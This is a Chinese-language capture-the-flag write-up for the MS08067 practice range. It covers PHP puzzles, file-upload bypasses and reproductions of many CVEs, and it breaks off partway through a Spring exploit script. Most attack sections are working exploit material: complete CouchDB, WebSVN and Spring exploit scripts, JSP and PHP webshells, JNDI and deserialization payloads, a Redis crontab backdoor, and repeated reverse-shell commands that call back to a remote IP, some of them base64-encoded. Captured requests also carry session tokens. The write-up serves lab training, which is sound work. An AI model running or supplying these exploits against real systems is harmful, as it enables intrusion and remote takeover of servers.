MS08067练武场--WP

免责声明：本文仅用于学习和研究目的，不鼓励或支持任何非法活动。所有技术内容仅供个人技术提升使用，未经授权不得用于攻击、侵犯或破坏他人系统。我们不对因使用本文内容而引起的任何法律责任或损失承担责任。

注：此文章为快速通关，方法不全，细节等还需自己多看文献·详解。

GPT 需要请看文章末.

综合起来，题目比较简单，多cve复现。感谢@A.M.～对本文的大力付出。

---

目录

资料：

真题模拟

1php代审

2路径穿越

3日志包含

4md5弱比较

5md5强类型

6登录框-密码爆破

7登录框-万能密码

8登录框-sql注入

文件上传场景

upload1--前端js

2-.htaccess绕过

3-MIME校验(后端）

4-文件头+MIME

5-文件名删除

6-文件名替换

7-%00截断

8-空字符截断

9-黑名单绕过

10-条件竞争

11-二次渲染

12-/.绕过后缀检测

13-数组绕过 

VIP

2014-4210 (weblogic 弱口令 加 上传）

junams

drupal

yapi

2018-1273

CouchDB

Websvn

Nostromo

xxl-job

jmeter

fastjson

xstream ???

log4j2 ????

场景靶场

镜像站

CodeExec

接口功能

Redis ？？？？

redis你猜

PUT

XXE

挺难的! ？？？

WEB

52

redis-Lua

flink

weblogic

SpringFramework

L4 ？？？

禅道CMS

cve-2019-9978

猫咪&cve-2020-13935 （题重）

广x

---

 

资料：

360 Phone N6 Pro内核漏洞 - Wiki

seacms:

【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721_cnvd-2020-22721-CSDN博客

---

真题模拟

1php代审

MS08067喊你来找Flag了
your key: <title>CheckMe-01</title>
<?php
print("<h1>MS08067喊你来找Flag了</h1>");
?>
<form action="index.php" method="POST">your key: <input type="text" name="key" /><input type="submit" value="Submit" />
</form>
<?php
if(!empty($_POST['key'])){$keys = $_POST['key'];show_source("index.php");$keys = base64_decode(urldecode($keys));if(strlen($keys)==6){if($keys=="ctfctf"){print("<p>You win!</p>");include("flag.php");print($flag);}}else{print("末心：大漏特漏！此乃九年义务教育漏网之鱼。");}
}
?>

Y3RmY3Rm

---

2路径穿越

欢迎来到CheckMe-02，快来寻找你的Flag并提交吧。
flag{6de32f81-5388-4baa-a7a3-01f1d0d4ece0} <?php include($_GET['url']);?>

---

3日志包含

<?php include($_GET['text']);?>

包含日志---webshell

env

set

---

4md5弱比较

<?php $flag="";$a=$_GET["a"];$b=$_GET["b"];if(isset($a) && isset($b)){if(!ctype_alpha($a)){die("a error");}if(!is_numeric($b)){die("b error");}if(md5($a)==md5($b)){echo $flag;}}else{  echo "请问，flag在哪里？";}?>

md5弱比较

总结ctf中 MD5 绕过的一些思路_ctf md5绕过-CSDN博客

a为字母

b为数字

---

5md5强类型

md5强类型绕过

<?php$a=$_GET["a"];$b=$_GET["b"];if($a!==$b && md5($a)===md5($b)){echo($flag);}?>

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

---

6登录框-密码爆破

admin

密码：xxxxxxxxx（全数字）

密码爆破就完了，

---

7登录框-万能密码

万能密码

admin'#

密码随便输

---

8登录框-sql注入

sqlmap post time-blind

---

文件上传场景

来源国光文件上传靶场

1-13

国光文件上传靶场 WriteUp | lololowe的博客

upload1--前端js

过前端js检测就

function checkfilesuffix()
{var file=document.getElementsByName('file')[0]['value'];if(file==""||file==null){swal("请添加上传文件", "", "error");return false;}else{var whitelist=new Array(".jpg",".png",".gif",".jpeg");var file_suffix=file.substring(file.lastIndexOf("."));if(whitelist.indexOf(file_suffix) == -1){swal("只允许上传图片类型的文件!", "", "error");return false;}}
}function error(){swal("上传失败", "", "error");
}

禁用js，上传php/上传jpg后缀，抓包，改jpg为php，过前端验证即可。

---

2-.htaccess绕过

题目：黑名单

.htaccess文件是Apache服务器特有的配置文件，默认启用，用于配置Apache服务器，具体用法可以参看此文章：https://xz.aliyun.com/t/8267?time__1311=n4%2BxnD0Dc7exyDjxYqGNWP4IrVnuYA5GCzReD其中我们可以利用到的.htaccess文件指令是AddHandler(SetHandler指令也可利用，但稍微长一些，具体用法参看刚提到的文章)，可以将特定的文件格式与特定的MIME类型进行绑定，例如将.jpg文件与application/x-httpd-php进行绑定，这样Apache服务器在解析.jpg文件时，就会将其当作php文件进行解析。上传 	.htaccess
# 将 .phps .php3p .png .jpg .gif 当做 PHP 文件解析
AddType application/x-httpd-php .phps .php3p .png .jpg .gif再上传shell.jpg 等等即可  解析为php

---

3-MIME校验(后端）

image/jpeg
image/png
image/gif
image/jpg上传shell.php文件，bp抓包将MIME类型由application/octet-stream改为image/jpeg，即可成功上传：
/上传shell.jpg  == image/jpg ，改后缀为 php  

---

4-文件头+MIME

MIME类型：
image/jpeg
image/jpg
image/png
image/gif文件头及对应的文件格式：
89504E47  --  .png
FFD8FFE0  --  .jpg
47494638  --  .gif

copy pic.png/b + shell.php/a shell.png
图片马

---

5-文件名删除

shell.php --- > shell.

shell.phphpp --> shell.php

6-文件名替换

shell.pphphp ---> shell.p hp

shell.PHP

xxxxxxxxxxxxxxxxxxxxxxxxx

---

7-%00截断

8-空字符截断

%00 再url-de

---

9-黑名单绕过

shell.php5

---

10-条件竞争

payload

<?php fputs(fopen('shell.php','w'),'<?php eval($_REQUEST[1]);?>');?><?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>

# coding:utf-8
import requests
from concurrent.futures import ThreadPoolExecutordef td(list):url = 'http://110.42.47.105:17373'file = {'upload_file': ('szm.php', "<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[1]);?>'); ?>")}data = {'submit': 'Upload'}r = requests.post(url=url, data=data, files=file)re = requests.get('http://110.42.47.105:17373/upload/shell.php')if re.status_code == 200:print('上传成功')if __name__ == '__main__':with ThreadPoolExecutor(20) as p:p.map(td, range(200000))

xxxxxxxxxxxxxxxxxxxxxxxx

---

11-二次渲染

http://110.42.47.105:17953/?file=./upload/1946210678.gif

gif

---

12-/.绕过后缀检测

---

13-数组绕过 

copy 1.jpg/b+2.php 3.jpg

本题主要考察代码审计，涉及到MIME验证+白名单+上传路径可控 
源码如下 
$is_upload = false; 
$msg = null; 
if(!empty($_FILES['upload_file'])){ //检查MIME $allow_type = array('image/jpeg','image/png','image/gif'); if(!in_array($_FILES['upload_file']['type'],$allow_type)){ $msg = "禁止上传该类型文件!"; }else{ //检查文件名 $file = empty($_POST['save_name']) ? 
$_FILES['upload_file']['name'] : $_POST['save_name']; if (!is_array($file)) { $file = explode('.', strtolower($file)); } $ext = end($file); $allow_suffix = array('jpg','png','gif'); if (!in_array($ext, $allow_suffix)) { $msg = "禁止上传该后缀文件!"; }else{ $file_name = reset($file) . '.' . $file[count($file) - 1]; $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH . '/' .$file_name; if (move_uploaded_file($temp_file, $img_path)) { 
$msg = "文件上传成功！"; 
$is_upload = true; 
} else { 
$msg = "文件上传失败！"; 
} 
} 
} 
}else{ 
$msg = "请选择要上传的文件！"; 
} 例如上传upload.php.jpg 
就会返回数组 
array(3){ 
[0]=>upload, 
[1]=>php, 
[2]=>jpg 
} –> 判断数组最后一个元素是否在白名单中 
因此，可利用数组构造最后一个元素为白名单内的后缀('jpg','png','gif')

---

VIP

2014-4210 (weblogic 弱口令 加 上传）

Weblogic漏洞复现之SSRF（CVE-2014-4210） flag在环境变量

Weblogic SSRF漏洞(CVE-2014-4210)漏洞复现 - 哔哩哔哩

/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.1:6379

weblogic

ssrf ？？？？？ bot !     内网ip我是真不知道。

弱口令+webshell：

弱口令 weblogic Oracle@123

大体上传流程： 渗透测试-Weblogic后台部署War大马_创建war大马-CSDN博客

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/upload

上传成功，访问 /21/21.jsp 连马子即可。

---

junams

junams 文件上传 （CNVD-2020-24741）复现-CSDN博客

---

drupal

Drupal 远程代码执行漏洞（CVE-2019-6339）简单复现 - Mke2fs - 博客园

Drupal 远程代码执行漏洞（CVE-2019-6339）goby 秒了  

---

yapi

YAPI是由去哪儿网移动架构组(简称YMFE，一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具，是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册，会导致攻击者注册后执行任意命令。

软件 ，接口 ，rce

YApi Mock 远程代码执行漏洞

---

2018-1273

goby 秒了

描述：Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下，将精心制作的请求参数注入到存在该漏洞的服务器上，从而发起远程代码执行攻击。

---

CouchDB

Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。EXP:
#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuthtarget = 'http://your-ip:5984'
command = rb"""sh -i >& /dev/tcp/10.0.0.1/443 0>&1"""
version = 1session = requests.session()
session.headers = {'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{"type": "user","name": "wooyun","roles": ["_admin"],"roles": [],"password": "wooyun"
}''')session.auth = HTTPBasicAuth('wooyun', 'wooyun')command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:host = session.get(target + '/_membership').json()['all_nodes'][0]session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')if version == 1:session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

---

Websvn

Websvn是一个应用软件。一个在线Subversion存储库浏览器，WebSVN 2.6.1之前版本存在安全漏洞，其search.php?search= 参数下过滤不严谨导致RCEEXP:
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305import requests
import argparse
from urllib.parse import quote_plusPAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/9999 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")args = parser.parse_args()if args.target.startswith("http://") or args.target.startswith("https://"):target = args.target
else:print("[!] Target should start with either http:// or https://")exit()requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))print("[*] Request send. Did you get what you wanted?")

---

Nostromo

脚本地址：GitHub - jas502n/CVE-2019-16278: Directory transversal to remote code execution

./CVE-2019-16278.sh IP地址 端口号 id

---

xxl-job

xxl-job远程命令执行漏洞复现_xxljob漏洞-CSDN博客

POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=pqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace=0|0; PHPSESSID=j49mvsid608froa0gcftn8euoe; login_auto=YXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num=0; eth0_time=1737625442; eth0=566.285; _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type: application/x-www-form-urlencoded{"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "echo 'bash -i >& /dev/tcp/39.105.154.133/9090 0>&1' > /tmp/1.sh","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0
}POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=pqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace=0|0; PHPSESSID=j49mvsid608froa0gcftn8euoe; login_auto=YXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num=0; eth0_time=1737625442; eth0=566.285; _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type: application/x-www-form-urlencoded{"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "chmod +x /tmp/1.sh","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0
}POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=pqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace=0|0; PHPSESSID=j49mvsid608froa0gcftn8euoe; login_auto=YXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num=0; eth0_time=1737625442; eth0=566.285; _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type: application/x-www-form-urlencoded{"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "/bin/bash /tmp/1.sh","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0
}监听，---上线。

---

jmeter

Jmeter RMI 反序列化命令执行漏洞

工具：

GitHub - Y4er/ysoserial: ysoserial修改版，着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。

https://github.com/Y4er/ysoserialjava -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24 21492 BeanShell1 'touch /tmp/success'
反弹shell：
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24 21492 BeanShell1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}"

---

fastjson

Fastjson漏洞复现 - kar3a - 博客园

GitHub - mbechler/marshalsec

创建恶意类 （带反弹shell）

javac ----> .class

启动http

用工具启动rmi，监听9999端口

发包，反弹shell，拿下。

curl http://27.25.151.24:28493/ -H "Content-Type: application/json" --data '{"name":"karsa", "age":22}'// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;public class TouchFile {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/39.105.154.133/6666 0>&1"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://39.105.154.133:1337/#TouchFile" 9999POC：
POST / HTTP/1.1
Host: 27.25.151.24:26795
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://39.105.154.133:9999/TouchFile","autoCommit":true}
}

---

xstream ???

CVE-2021-29505 XStream远程代码执行漏洞复现

CVE-2021-21351:XStream反序列化远程代码执行漏洞简析

Xstream反序列化漏洞复现 - Arrest - 博客园

/bin/bash -i>& /dev/tcp/39.105.154.133/9090 0>&1L2Jpbi9iYXNoIC1pPiYgL2Rldi90Y3AvMzkuMTA1LjE1NC4xMzMvOTA5MCAwPiYxjava -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pPiYgL2Rldi90Y3AvMzkuMTA1LjE1NC4xMzMvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"POST / HTTP/1.1
Host: 192.168.50.129:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 1675
​
<java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> </default> <int>3</int> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> <parsedMessage>true</parsedMessage> <soapVersion>SOAP_11</soapVersion> <bodyParts/> <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> <attachmentsInitialized>false</attachmentsInitialized> <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> <names> <string>aa</string> <string>aa</string> </names> <ctx> <environment/> <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> <java.rmi.server.RemoteObject> <string>UnicastRef</string> <string>39.105.154.133</string> <int>4444</int> <long>0</long> <int>0</int> <long>0</long> <short>0</short> <boolean>false</boolean> </java.rmi.server.RemoteObject> </registry> <host>39.105.154.133</host> <port>4444</port> </ctx> </candidates> </aliases> </nullIter> </sm> </message> </value> </javax.naming.ldap.Rdn_-RdnEntry> </java.util.PriorityQueue> </java.util.PriorityQueue>POST / HTTP/1.1
Host: 27.25.151.24:27172
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0
Referer: http://attck.ms08067.com/
Content-Type: application/xml<java.util.PriorityQueue serialization='custom'><unserializable-parents/><java.util.PriorityQueue><default><size>2</size></default><int>3</int><javax.naming.ldap.Rdn_-RdnEntry><type>12345</type><value class='com.sun.org.apache.xpath.internal.objects.XString'><m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj></value></javax.naming.ldap.Rdn_-RdnEntry><javax.naming.ldap.Rdn_-RdnEntry><type>12345</type><value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'><message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'><parsedMessage>true</parsedMessage><soapVersion>SOAP_11</soapVersion><bodyParts/><sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'><attachmentsInitialized>false</attachmentsInitialized><nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'><aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'><candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'><names><string>aa</string><string>aa</string></names><ctx><environment/><registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'><java.rmi.server.RemoteObject><string>UnicastRef</string><string>39.105.154.133</string><int>6666</int><long>0</long><int>0</int><long>0</long><short>0</short><boolean>false</boolean></java.rmi.server.RemoteObject></registry><host>39.105.154.133</host><port>6666</port></ctx></candidates></aliases></nullIter></sm></message></value></javax.naming.ldap.Rdn_-RdnEntry></java.util.PriorityQueue>
</java.util.PriorityQueue>

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -i >& /dev/tcp/39.105.154.133/9090 0>&1 2>&1" -A 39.105.154.133bash -i >& /dev/tcp/39.105.154.133/8888 0>&1 2>&1rmi://39.105.154.133:1099/jskfvrjava 1.8 8 11 17 

---

log4j2 ????

https://github.com/welk1 n/JNDI-Injection-Exploit/releases/tag/v1.0

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "想要执行的命令" -A "攻击机 的ip"java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0OS4xMjgvNzc3NyAwPiYx} |{base64,-d} | {bash,-i}" -A "攻击机ip"java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy8xMDAwMSAwPiYx} |{base64,-d} | {bash,-i}" -A "39.105.154.133"${jdni:rmi://39.105.154.133:1099/vacwrg}==================================
使用JNDI-Injection-Exploit.jar工具生成反弹shell ：(反弹语句：bash -i >& /dev/tcp/xx..xx.88/10001 0>&1)

---

场景靶场

镜像站

ssrf

CTFHub之Web篇之Web实战之SSRF（更新中~~） - AcWing

file协议读取即可

---

CodeExec

目录扫描

扫出 [12:08:43] 200 - 199B - /shell.php

访问 get cmd 执行命令

?cmd=set

---

接口功能

ping

---

Redis ？？？？

未授权

// 设置key
set xxx "\n\n* * * * * bash -i>& /dev/tcp/39.105.154.133/9090 0>&1\n\n"
//添加名为xxx的key，值为后面反弹shell的语句,5个星号代表每分钟执行一次，其中的\n同样是为了换行，避免crontab的语法错误。这里你也可以去不加\n，去看看乱码，踩个坑才能印象深刻
// 设置路径
config set dir /var/spool/cron/
// 设置文件名
config set dbfilename root
// 保存key值到root文件中
save
然后等待成功就行了flag{7b992efb5ab23a3a3d5100e366c48423}flag{7b992efb5ab23a3a3d5100e366c48423}http://101.43.64.97:36291/
redis-cli -h 101.43.64.97 -p 36291// 设置key
set xxx "\n\n* * * * * bash -i>& /dev/tcp/39.105.154.133/2333 0>&1\n\n"
//添加名为xxx的key，值为后面反弹shell的语句,5个星号代表每分钟执行一次，其中的\n同样是为了换行，避免crontab的语法错误。这里你也可以去不加\n，去看看乱码，踩个坑才能印象深刻
// 设置路径
config set dir /var/spool/cron/
// 设置文件名
config set dbfilename root
// 保存key值到root文件中
save
然后等待成功就行了

---

redis你猜

文件包含

/etc/redis.conf

---

PUT

Tomcat任意写入文件漏洞（CVE-2017-12615）

抓首页包，改包，改请求方式：

PUT /1.jsp/ HTTP/1.1
Host: 101.43.64.97:37944
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5shell马子。rce
<%java.io.InputStream is = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];while ((a = is.read(b)) != -1) {out.print(new String(b));}
%>

xxxx?cmd=env

---

XXE

登录框，

CTF XXE - MustaphaMond - 博客园

---

挺难的! ？？？

mysql

---

WEB

52

cve-2017-5638

struts2-045 远程代码执行漏洞（CVE-2017-5638)

随便上传一个文件

url复制过来，直接检测

---

redis-Lua

春秋云境：CVE-2022-0543（Redis 沙盒逃逸漏洞）-CSDN博客

redis-cli -h xxx -p xxx

payload:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("env", "r"); local res = f:read("*a"); f:close(); return res' 0

---

flink

文件上传 jsp

.jar

goby 利用。

---

weblogic

rce

goby秒了

---

SpringFramework

Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包，是一个包含Spring框架基本的核心工具包，Spring其他组件都要使用到这个包。

#!/usr/bin/env python3
#coding:utf-8import requests
import argparse
from urllib.parse import urljoindef Exploit(url):headers = {"suffix":"%>//","c1":"Runtime","c2":"<%","DNT":"1","Content-Type":"application/x-www-form-urlencoded"}data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="try:go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)shellurl = urljoin(url, 'tomcatwar.jsp')shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)if shellgo.status_code == 200:print(f"漏洞存在，shell地址为:{shellurl}?pwd=j&cmd=whoami")except Exception as e:print(e)passdef main():parser = argparse.ArgumentParser(description='Srping-Core Rce.')parser.add_argument('--file',help='url file',required=False)parser.add_argument('--url',help='target url',required=False)args = parser.parse_args()if args.url:Exploit(args.url)if args.file:with open 